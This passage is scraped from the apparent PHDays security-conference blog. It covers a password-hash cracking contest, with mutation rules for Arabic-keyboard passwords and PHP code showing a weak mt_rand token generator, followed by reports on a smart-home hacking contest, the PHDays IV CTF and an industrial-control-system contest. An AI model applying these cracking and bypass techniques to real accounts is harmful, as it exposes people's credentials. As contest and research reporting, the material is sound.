boost in cracking.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-AoKVtrycXp4/U7vReAWY65I/AAAAAAAAEE0/SxBawDaMidk/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-AoKVtrycXp4/U7vReAWY65I/AAAAAAAAEE0/SxBawDaMidk/s1600/2.png" height="430" width="640" /></a></div><br /><b>Lotus H-hash</b><br />Apart from two known hash types, lotus5 and dominosec (g-hash), newer hashes for versions >8 were generated. While the former two types were among the most popular for cracking, the latter one wasn’t touched at all. Good thing we haven’t seen them in wild life yet.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-8ocfhzplHtA/U7vRkxUWO3I/AAAAAAAAEE8/1ObL5kFNRtM/s1600/3_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-8ocfhzplHtA/U7vRkxUWO3I/AAAAAAAAEE8/1ObL5kFNRtM/s1600/3_1.png" height="130" width="640" /></a></div><br /><b>Arabic forum</b><br />This forum was all about the targeted attack. One can't simply bruteforce an iterated MD5 hash if he/she doesn't know anything about the plaintext. Yes, there were “simple” hashes consisting of less than five English letters, but they were created with mapping from the Arabic keyboard to the English one. Most (if not all) dictionaries become useless if they are used against national alphabets. The only way is to create one yourself, for example, by parsing dictionaries or targeted sites. Thus, a forum is a great place to start. It contains vast amount of words that people actually use, and crawling such resource can give essential information about possible plaintexts. But sometimes crawling is not enough, you should also think about common things used in uncommon ways. There are at least four types of Unicode symbols only for encoding numbers, and one of our mutation masks was just appending two Unicode Arabic numbers to the plaintext. Actually, there were three mutations used:<br /><br /><ol style="text-align: left;"><li>Prefixing with three non-Unicode Arabic numbers.</li><li>Suffixing with two Unicode Arabic numbers.</li><li>Keyboard mapping to Latin letters.</li></ol><br /><b>mtrand()</b><br />The idea of this task was all about bad “random” numbers, which are used by not-so-experienced developers. Let us imagine that we have a forum/blog/any other website. All we want is a secure mean to create tokens that we will use to reset user passwords. One can use a linear congruential generator, but this task was about the Mersenne twister pseudorandom generator, which is really nice on paper with period of 219937 and seed of 32 bits. The seed is a problem for security — if we know the seed, we can reproduce the full stream of pseudorandom numbers. But this issue is implicitly mitigated by the common implementation: once the generator is seeded, its state will start to produce pseudorandom numbers different from those created by another seed. Now an attacker should implement the full Mersenne twister algorithm and bruteforce not only the seed (which is relatively small), but also the place of the target pseudo random number in the generated stream.<br /><br />This approach should be enough for both h-type and l-type hashes, but we created two types on purpose. A developer can shoot himself in the leg not only by using a cryptographically unsecure random number generator, but also by using the generated stream badly. When you use integers or float type in your programming language, you should remember about the maximum precision for each type and the text representation of numbers. Here is an example. It should seem that if the product of three numbers 123456789 * 123456789 * 123456789 gives 1881676371789154860897069 in general decimal arithmetic, then you will get ~79 bits of entropy with its character representation. However, if your programming language uses floating numbers to handle such big numbers, then the result will be somewhat like 1.8816763717892E+24, which has only ~45 bits of entropy and can be easily bruteforced for any fast algorithm.<br /><br />This task was haunted by bad luck. First of all, hashes in the web database were hashed only with one iteration of MD4, and the original code of generating h-hashes was a bit different from the code on the web.<br /><br />Generate light plaintexts<br /><br /><span style="font-family: Courier New, Courier, monospace;">function generate_password($length)</span><br /><span style="font-family: Courier New, Courier, monospace;">{</span><br /><span style="font-family: Courier New, Courier, monospace;"> $result = 1;</span><br /><span style="font-family: Courier New, Courier, monospace;"> for($i=0; $i<$length; ++$i) $result *= mt_rand();</span><br /><span style="font-family: Courier New, Courier, monospace;"> return $result;</span><br /><span style="font-family: Courier New, Courier, monospace;">}</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">for ($i=0; $i<$argv[1]; ++$i)</span><br /><span style="font-family: Courier New, Courier, monospace;">{</span><br /><span style="font-family: Courier New, Courier, monospace;"> if (($i % 32) == 0){</span><br /><span style="font-family: Courier New, Courier, monospace;"> mt_srand(get_real_rand());</span><br /><span style="font-family: Courier New, Courier, monospace;"> $skip = get_real_rand() & 0xFFFF + 8192; // Fix for easy attack</span><br /><span style="font-family: Courier New, Courier, monospace;"> for ($j=0; $j<$skip; ++$j)</span><br /><span style="font-family: Courier New, Courier, monospace;"> mt_rand();</span><br /><span style="font-family: Courier New, Courier, monospace;"> }</span><br /><span style="font-family: Courier New, Courier, monospace;"> echo generate_password(3)."\n";</span><br /><span style="font-family: Courier New, Courier, monospace;"> $skip = get_real_rand() & 0xFF; // Fix for easy attack</span><br /><span style="font-family: Courier New, Courier, monospace;"> for ($j=0; $j<$skip; ++$j)</span><br /><span style="font-family: Courier New, Courier, monospace;"> mt_rand();</span><br /><span style="font-family: Courier New, Courier, monospace;">}</span><br /><br />Generate hard plaintexts<br /><br /><span style="font-family: Courier New, Courier, monospace;">function generate_password($length)</span><br /><span style="font-family: Courier New, Courier, monospace;">{</span><br /><span style="font-family: Courier New, Courier, monospace;"> $result = 1;</span><br /><span style="font-family: Courier New, Courier, monospace;"> for($i=0; $i<$length; ++$i) $result .= mt_rand();</span><br /><span style="font-family: Courier New, Courier, monospace;"> return $result;</span><br /><span style="font-family: Courier New, Courier, monospace;">}</span><br /><span style="font-family: Courier New, Courier, monospace;"><br /></span><span style="font-family: Courier New, Courier, monospace;">for ($i=0; $i<$argv[1]; ++$i)</span><br /><span style="font-family: Courier New, Courier, monospace;">{</span><br /><span style="font-family: Courier New, Courier, monospace;"> if (($i % 32) == 0){</span><br /><span style="font-family: Courier New, Courier, monospace;"> mt_srand(get_real_rand());</span><br /><span style="font-family: Courier New, Courier, monospace;"> $skip = get_real_rand() & 0xFFFF + 128; // Fix for easy attack</span><br /><span style="font-family: Courier New, Courier, monospace;"> for ($j=0; $j<$skip; ++$j)</span><br /><span style="font-family: Courier New, Courier, monospace;"> mt_rand();</span><br /><span style="font-family: Courier New, Courier, monospace;"> }</span><br /><span style="font-family: Courier New, Courier, monospace;"> echo generate_password(3)."\n";</span><br /><span style="font-family: Courier New, Courier, monospace;"> $skip = get_real_rand() & 0xFF; // Fix for easy attack</span><br /><span style="font-family: Courier New, Courier, monospace;"> for ($j=0; $j<$skip; ++$j)</span><br /><span style="font-family: Courier New, Courier, monospace;"> mt_rand();</span><br /><span style="font-family: Courier New, Courier, monospace;">}</span><br />As you can see, there is concatenation with a non-empty string containing number 1, so the numbers generated this way were actually unbrutable, even if someone would have managed to recreate MT rand generation or use the Solar Designer's code (<a href="http://www.openwall.com/php_mt_seed/">http://www.openwall.com/php_mt_seed/</a>).<br /><br /><b>Tomato</b><br />Ντομάτα, домат, Парадајз, Помідор, томат, улаанлооль, Լոլիկ, პომიდორი, टमाटर, टोमॅटो, हिण्डीरः, ਟਮਾਟਰ, ಟೊಮೇಟೊ, தக்காளி, තක්කාලි, 番茄, 蕃茄, …<br />No comments.<br /><br /><b>Wonderful</b><br />We received many questions about this task and methods we suggest to solve it. Actually, we don't know. This task (and mt_rand with Arabic) was developed to draw attention to some weaknesses of the current bruteforce utilities. During our work, we managed to find different old/unpopular applications. Many of them use just plain MD5, but some can use very weird schemes like SHA1(base64(MD5(base64(SFA1())))). SHA1 is widely used, base64 is cheap, but there is no obvious way to handle such hash. The idea to create a self-servicing module for such task is not feasible, but the idea to get a tool combining different bruteforce modules in arbitrary manner could be good. And don't forget to optimize HMAC with 1 MB file, as it will be just hashed to a small constant value :)<br /><br /><b><span style="font-size: large;">Statistics</span></b><br />Some nice graphics based on submissions during the contest. Hope you will find them interesting, and we are sorry if we disclose more information about the top-3 teams’ strategy than they wish to.<br /><br />Graph by points<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-PzbT2Xysvss/U7vSDoX_yHI/AAAAAAAAEFE/Q8MCyDQzIRY/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-PzbT2Xysvss/U7vSDoX_yHI/AAAAAAAAEFE/Q8MCyDQzIRY/s1600/4.png" height="440" width="640" /></a></div><br /> Graph by the number of hashes<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-K8s5abbldow/U7vSIjXaaCI/AAAAAAAAEFM/GrBxzMPgOSY/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-K8s5abbldow/U7vSIjXaaCI/AAAAAAAAEFM/GrBxzMPgOSY/s1600/5.png" height="440" width="640" /></a></div><br /> Cumulative progress of all teams by the percentage of bruted hashes<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-_7tkcX8f6o4/U7vSNUxmAkI/AAAAAAAAEFU/Mf0zO1YraKo/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-_7tkcX8f6o4/U7vSNUxmAkI/AAAAAAAAEFU/Mf0zO1YraKo/s1600/6.png" height="436" width="640" /></a></div><br />Cumulative progress of all teams by the percentage of bruted hashes of different types<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-BFvzKXxZZFI/U7vSWTX0VWI/AAAAAAAAEFc/SERhT1D9XOc/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-BFvzKXxZZFI/U7vSWTX0VWI/AAAAAAAAEFc/SERhT1D9XOc/s1600/7.png" height="444" width="640" /></a></div><br />Part 1<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-uQxAw8jo5EE/U7vSbwRRBTI/AAAAAAAAEFk/nqMGk37fePo/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-uQxAw8jo5EE/U7vSbwRRBTI/AAAAAAAAEFk/nqMGk37fePo/s1600/8.png" height="442" width="640" /></a></div><br />Part 2 (pay attention to the maximum value here)<br /><br />Progress of InsidePro by hash type<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-WD3tsA28d4M/U7vSfxJTImI/AAAAAAAAEFs/keH3ptCklmw/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-WD3tsA28d4M/U7vSfxJTImI/AAAAAAAAEFs/keH3ptCklmw/s1600/9.png" height="442" width="640" /></a></div><br /> Progress of hashcat by hash type<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/--qKGIs1krzM/U7vSkjUhklI/AAAAAAAAEF0/O30861VYFN0/s1600/10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/--qKGIs1krzM/U7vSkjUhklI/AAAAAAAAEF0/O30861VYFN0/s1600/10.png" height="450" width="640" /></a></div><br /> Progress of john-users by hash type<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-DtzDhtH8qrI/U7vSyLtsEvI/AAAAAAAAEF8/-jO-E1Ocy-Q/s1600/11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-DtzDhtH8qrI/U7vSyLtsEvI/AAAAAAAAEF8/-jO-E1Ocy-Q/s1600/11.png" height="444" width="640" /></a></div><br /><br /><b><span style="font-size: large;">Epilogue</span></b><br />It all started with beer in a Hamburg cafe during 30C3 and not everything came up as expected ;)<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-ufwerZpYF6w/U7vTPv0W19I/AAAAAAAAEGM/xwJ41mhh1Cc/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-ufwerZpYF6w/U7vTPv0W19I/AAAAAAAAEGM/xwJ41mhh1Cc/s1600/13.png" height="557" width="640" /></a></div><br /></div><a href="http://i.imgur.com/4IgyXny.png">Full size</a></div>Unknownnoreply@blogger.com933tag:blogger.com,1999:blog-5176771794789502609.post-25209564719948312682014-06-23T15:23:00.000+04:002014-06-23T15:23:03.214+04:00Survive Hacking at PHDays. Cyber Threats of a Common Apartment<div dir="ltr" style="text-align: left;" trbidi="on">Items and devices we use are becoming more and more convenient. Today, we have internet connection in our cars and even in certain kinds of microwaves and fridges. According to Gartner, there will be more than 26 billion intelligent home appliances while the market size will grow to 300 billion dollars by 2020.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-xU71rk4cU_c/U6gNS19IqVI/AAAAAAAAED4/Svnm3Wyz5z4/s1600/insane.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-xU71rk4cU_c/U6gNS19IqVI/AAAAAAAAED4/Svnm3Wyz5z4/s1600/insane.png" height="426" width="640" /></a></div><br /><br />However, few people realize that common computers with access to the internet and gadgets that make up the so-called internet of things are vulnerable to attacks. <a href="http://www.phdays.com/" target="_blank">PHDays</a> organizers created a model of a real apartment equipped with various electrical appliances and a smart home system in order to demonstrate the possible consequences of hackers' attacks. Due to an error, all devices of the apartment has gone insane and turned out to be a trial for the owner. Participants of the contest needed to release him.<br /><a name='more'></a><br />The smart home appliances are controlled by a controller. The controller regulated lighting and water systems, TV, a vacuum cleaner and other appliances.<br /><br />When getting inside, anyone should go through an identification process. Height and weight of a person were measured by various sensors. There also was a palm recognition system installed in the system.<br /><br />After completing the identification process, the system unlocked a control HMI. Contestants could get access to the HMI using a tablet left in the apartment. But a contestant needed to unlock it first. There was a defect in Android's Face Unlock technology: it can be bypassed by bringing the owner's photo to the tablet's camera (there was one on the wall). A participant could also unlock the tablet by beating artificial intelligence at a chess game.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-f8HGEydbWXU/U6gNqLkonMI/AAAAAAAAEEA/9JkEPxPrQs4/s1600/IMG_5081.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-f8HGEydbWXU/U6gNqLkonMI/AAAAAAAAEEA/9JkEPxPrQs4/s1600/IMG_5081.jpg" height="640" width="426" /></a></div><br />Each task had alternative solving methods that involved detection and exploitation of vulnerabilities in the system. "Undocumented features", which allowed bypassing the logical operation of the devices, originated from the incorrect implementation of interaction in a client-server application. But unfortunately, only a few participants used their hacking skills.<br /><br />To win, a contestant needed to solve all tasks and to gain control over the smart home system faster than competitors. A participant with the nickname Cryden became the winner with a time of 6 minutes and 3 seconds.<br /><br />The Survive Hacking contest is the continuation of the last year's Labyrinth competition that took place at Positive Hack Days III. During this competition, participants needed to clear obstacles—rooms with laser field, motion detectors etc.<br /><br /></div>Unknownnoreply@blogger.com121tag:blogger.com,1999:blog-5176771794789502609.post-80654639970184476482014-06-19T12:47:00.000+04:002014-06-19T12:47:16.203+04:00PHDays IV CTF: How It Was<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-WGoraqjQwLs/U6Kh4wzsE0I/AAAAAAAAEC0/qfOuKY3HA3o/s1600/ctf1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-WGoraqjQwLs/U6Kh4wzsE0I/AAAAAAAAEC0/qfOuKY3HA3o/s1600/ctf1.png" height="282" width="640" /></a></div>Positive Hack Days IV, which was held on May 21 and 22, traditionally hosted a CTF contest. During two days, ten teams from six countries hacked rivals' networks and beat back attacks.<br /><br />Positive Hack Days CTF's game infrastructure and tasks are usually designed according to a legend that adds special appeal to the contest. During the last year's CTF, participants became the saviors of the fictional world D’Errorim. As the task was solved, they realized that they were fighting on the wrong side, and now their own home is <a href="http://www.phdays.com/ctf/quals-iv/" target="_blank">in danger</a>. So the plotline of PHDays III CTF and PHDays IV CTF are related.<br /><br />The text of the <a href="http://www.phdays.com/ctf/index.php?id=2" target="_blank">legend</a> is available on the forum's website.<br /><a name='more'></a><br /><b>The game principle</b><br /><br />There are usually two types of CTF contests. First, task-based contests, where the goal is to solve tasks. Second, attack & defense contests, during which teams need to protect their systems and attack other teams. Positive Hack Days CTF combines these concepts and add original game mechanics. For instance, in addition to standard tasks and services that contains vulnerabilities, PHDays CTF organizers developed unique quests with limited lifetime, bonus for which depends on how many teams solved these tasks.<br /><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-hAE-L4FyzGk/U6KiNnc9PdI/AAAAAAAAEC8/NKJFuPq_ZA8/s1600/ctf2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-hAE-L4FyzGk/U6KiNnc9PdI/AAAAAAAAEC8/NKJFuPq_ZA8/s1600/ctf2.png" height="360" width="640" /></a></div><br />Moreover, organizers provides an opportunity to earn additional points by taking part in the basic program's contests. In 2012, teams <a href="http://blog.phdays.com/2012/05/ctf-challenges-continue.html" target="_blank">tried to get</a> flags by dumpster diving. During <a href="http://blog.phdays.com/2013/06/hdays-iii-ctf-levart-derrorim.html" target="_blank">PHDays III</a>, participants received additional points if they managed to pass through a special labyrinth.<br /><br />This time, participants could try themselves in discovering vulnerabilities in industrial systems and protocols during the <a href="http://www.phdays.com/program/contests/#17036" target="_blank">Critical Infrastructure Attack</a> contest. RDot, one of the teams, gained additional points during this contest.<br /><br />The main task of the second day was security assessment of a real QIWI terminal that was set at the venue. Before the contest began, CTF teams were provided with copies of software installed on the terminal. Then they had full physical access to the terminal (including connection of other devices). Participants needed to transfer money (313,370 rubles) to a special digital wallet. More Smoked Leet Chicken was the closest team to win.<br /><br /><b>Visualization</b><br /><br />To make the competition more entertaining, the organizers developed a special visualizing system in the fantasy style last year. This year organizers renewed the system. The special application for <a href="https://itunes.apple.com/ru/app/phdays-iv-ctf-visualizer/id875911386?mt=8" target="_blank">iOS</a> and <a href="https://play.google.com/store/apps/details?id=com.ptsecurity.phd4ctfvis" target="_blank">Android</a> allowed anyone to watch the game on his or her phone display (the application is still available).<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-I5-CWK_vfyg/U6KjUH6dapI/AAAAAAAAEDM/2p3ppW7US9A/s1600/ctf3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-I5-CWK_vfyg/U6KjUH6dapI/AAAAAAAAEDM/2p3ppW7US9A/s1600/ctf3.png" height="402" width="640" /></a></div><br />Visitors of the forum could watch the game on big screens.<br /><br /><b>Winners</b><br /><br />The contest was really fierce. During two days of the forum, different teams enjoyed the leading place at various times. Several teams were in the top-3 during the contest: ntr3pids, More Smoked Leet Chicken, Dragon Sector, SecurityFirst, Reallynonamesfor, BalalaikaCr3w and Ufologists.<br /><br />The Polish team Dragon Sector became the winner. int3pids from Spain took second place, and the Russian team Balalaika Cr3w came third.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-NrX39xZzmtI/U6KjbI1OnKI/AAAAAAAAEDU/yeUJj_cP6IU/s1600/ctf4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-NrX39xZzmtI/U6KjbI1OnKI/AAAAAAAAEDU/yeUJj_cP6IU/s1600/ctf4.png" height="426" width="640" /></a></div><br />Teams from all over the world — from the USA to Japan — participate in PHDays CTF every year. More than 600 teams from all over the world have registered to take part in this year’s PHDays CTF.<br /><br />This year PHDays CTF took place for the fourth time. The contest was launched during the Positive Hack Days forum in 2011. Back then, the team PPP from the US was the winner. The following year in 2012 Leet More from Russia took first place. In 2013 at PHDays III, Eindbazen from the Netherlands took the top prize. Now we can say that a tradition has been established: every year a new team from a new country wins the contest.<br /><div><br /></div></div>Unknownnoreply@blogger.com183tag:blogger.com,1999:blog-5176771794789502609.post-8104252477667536322014-06-16T15:40:00.000+04:002014-06-16T15:40:25.711+04:00Smart City Hacked at PHDays IV<div dir="ltr" style="text-align: left;" trbidi="on">The Critical Infrastructure Attack (CIA) contest at Positive Hack Days IV has shown for the second time how weak critical infrastructure systems can be in terms of security. The participants successfully compromised various ICS systems during this two-day contest.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-KmZaDlooh2M/U57Tn1v9OyI/AAAAAAAAEBM/HMkLrd8xFK4/s1600/CIA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-KmZaDlooh2M/U57Tn1v9OyI/AAAAAAAAEBM/HMkLrd8xFK4/s1600/CIA.png" height="496" width="640" /></a></div><br />Last year at PHDays III, the contest was held with different name – Choo Choo Pwn. Organizers designed a transportation system controlled by real ICS hardware and software.<br /><a name='more'></a><br />The contest's infrastructure was massively updated.. Organizers added new SCADA systems (such as <a href="http://www.siemens.com/entry/cc/en/" target="_blank">Siemens</a> <a href="http://www.industry.siemens.com/topics/global/en/tia-portal/hmi-sw-tia-portal/Pages/Default.aspx" target="_blank">TIA Portal 13 Pro</a> and <a href="http://www.schneider-electric.com/products/ww/en/6000-telemetry-remote-scada-systems/6030-remote-scada-software/61264-struxureware-scada-expert-clearscada/" target="_blank">Schneider Electric ClearSCADA 2014</a>) and various OPC servers (<a href="http://www.kepware.com/" target="_blank">Kepware</a> <a href="http://www.kepware.com/Products/kepserverex_features.asp" target="_blank">KepServerEX</a>, <a href="http://honeywell.com/Pages/Home.aspx" target="_blank">Honeywell</a> <a href="http://www.matrikonopc.com/" target="_blank">Matrikon OPC</a>). New HMI devices, the operator panel <a href="http://www.automation.siemens.com/mcms/human-machine-interface/en/operator-interfaces/basic-panel/devices-first-generation/Pages/Default.aspx" target="_blank">Siemens KTP 600</a>, PLC (<a href="http://www.automation.siemens.com/mcms/programmable-logic-controller/en/simatic-s7-controller/s7-300/pages/default.aspx" target="_blank">Siemens Simatic S7-300</a> and <a href="http://www.automation.siemens.com/mcms/programmable-logic-controller/en/simatic-s7-controller/s7-1500/pages/default.aspx" target="_blank">S7-1500</a>)and remote control devices (<a href="http://www.icpdas-usa.com/pet-7000s.php" target="_blank">ICP DAS PET-7067</a>) were presented as well. <a href="http://www.schneider-electric.com/products/ww/en/5400-substation-automation-systems/5420-controllers/60784-micom-c264/" target="_blank">Schneider Electric MiCOM C264</a> was provided by <a href="http://www.croc.ru/eng/about/index.php" target="_blank">CROC</a>.<br /><br />The contest's stand was created by Ilya Karpov, ICS security expert at Positive Technologies, and his colleagues from the group of SCADA security researchers.<br /><br />Contestants needed to discover and exploit vulnerabilities in SCADA systems and industrial protocols in order to gain control over robotic arm, cranes, heating plants, transport management and illumination systems. Moreover, there was an opportunity of remote control over certain elements: robots, plant facilities, a railroad crossing, and cooling towers.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-D0OsO-5nMHo/U57WCZ9ZNAI/AAAAAAAAEBY/7mN8y8iW2aE/s1600/ci2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-D0OsO-5nMHo/U57WCZ9ZNAI/AAAAAAAAEBY/7mN8y8iW2aE/s1600/ci2.png" height="200" width="640" /></a></div><br />Similar SCADA systems and controllers are commonly used in a number of critical objects of various industries: factories and water power plants, transport infrastructure, oil and gas.<br /><br /><a href="http://alisa.sh/" target="_blank">Alisa Shevchenko</a> became the winner of the two-day competition – she detected several zero-day vulnerabilities in <a href="http://www.indusoft.com/" target="_blank">Indusoft Web Studio 7.1</a> by Schneider Electric. Nikita Maksimov shared second place with Pavel Markov. They managed to disrupt <a href="http://www.icpdas-usa.com/pet-7000s.php" target="_blank">RTU PET-7000</a>, provided by ICP DAS, and guess the password of the web interface for the controller <a href="http://ab.rockwellautomation.com/Programmable-Controllers/MicroLogix-1400" target="_blank">Allen-Bradley MicroLogix 1400</a> by Rockwell Automation. Dmitry Kazakov took third place. He discovered XSS vulnerabilities (published) in the web interfaces of the <a href="http://www.automation.siemens.com/mcms/programmable-logic-controller/en/simatic-s7-controller/s7-1200/pages/default.aspx" target="_blank">Simatic S7-1200</a> controllers by Siemens.<br /><br />"Contestants managed to gain control over robots and cranes via Modbus TCP. During the two days, they detected many critical vulnerabilities, most of them being in Simatic S7-1200 controllers. What's more, during the second day, one of the participants caused several operation failures of MiniWeb’s web server <a href="http://www.automation.siemens.com/mcms/human-machine-interface/en/visualization-software/wincc-flexible/Pages/Default.aspx" target="_blank">WinCC Flexible 2008 SP3 Update4</a>," — said Ilya Karpov.<br /><br />If exploited in real life, discovered vulnerabilities could cause harmful consequences, such as denial of service, functional failure of critical infrastructure management systems, which in its turn may disrupt normal life of an entire city'.<br /><br />According to the responsible disclosure policy, contestants notify respective vendors about vulnerabilities they detected. Details about the vulnerabilities will be available after the vendors address the vulnerabilities.<br /><br />As a winner Alisa Shevchenko received a special prize – the quadrocopter <a href="http://www.dji.com/product/phantom-2-vision-plus" target="_blank">Phantom 2 Vision+</a>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-bI8r6F_YUNA/U57XBJ0_w_I/AAAAAAAAEBk/xi-u1JG7AuU/s1600/cia3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-bI8r6F_YUNA/U57XBJ0_w_I/AAAAAAAAEBk/xi-u1JG7AuU/s1600/cia3.png" height="320" width="320" /></a></div><br /><div style="text-align: center;"><i>Pictured: Alisa Shevchenko</i></div><br />The winners of the last year's Choo Choo Pwn <a href="http://blog.phdays.com/2013/05/students-found-scada-vulnerabilities-at.html" target="_blank">were</a> Mikhail Elizarov, a student from the North Caucasian Federal University (Stavropol Krai, Russia) and Arseny Levshin, a university student from Minsk.<br /><br />Contest on critical infrastructure security is one of the main attractions of PHDays. Positive Technologies experts also presented the contest’s stand and workshops at Power of Community and at the 30th Chaos Communication Congress in Hamburg.<br /><div><br /></div></div>Unknownnoreply@blogger.com944